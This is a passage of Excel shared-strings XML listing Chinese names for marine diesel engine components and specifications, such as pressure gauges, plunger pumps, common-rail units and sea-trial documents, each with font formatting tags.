      <t>镀锌板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台底板栏杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台支撑件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台支撑布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>堵塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抽心铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺塞（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SRG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带电缆插头订货图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插入接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动冲击扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动伐组</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指针</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮指针</t>
    </r>
  </si>
  <si>
    <r>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>码位置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位标尺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊后热处理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率放大器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝压力管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>精密无缝钢管（出证）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>精密控制阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高精无缝管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油预热图表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热冷却水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头销防护说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保养说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表和温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力瓶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压喷嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力调节单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保压阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左旋压簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压簧（右旋）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力状态</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力转换管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关及传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力试验工具，活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力发送装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预紧装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预紧千斤顶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要部件尺寸及重量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机基座剖面图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成型刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尖头叉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接近传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表连接</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTFE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑轮装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑轮板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑轮支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手拉葫芦吊</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脉冲电子元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脉冲式气缸注油器系统参数</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脉冲式气缸注油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞泵套筒组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵缸体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动液压泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>按键</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套铸造规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆火焰淬火规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工艺</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量和检测规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量与试验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量和检验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量代码</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力部件测试规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系泊试验和试航</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系泊试验</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试航</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快动销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速安全阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨单元安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修理板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨阀更换规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆</t>
    </r>
  </si>
  <si>
    <r>
      <t>RAKO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复合箱体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形空心管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>整流器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>异径接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>异径接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>异径接管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
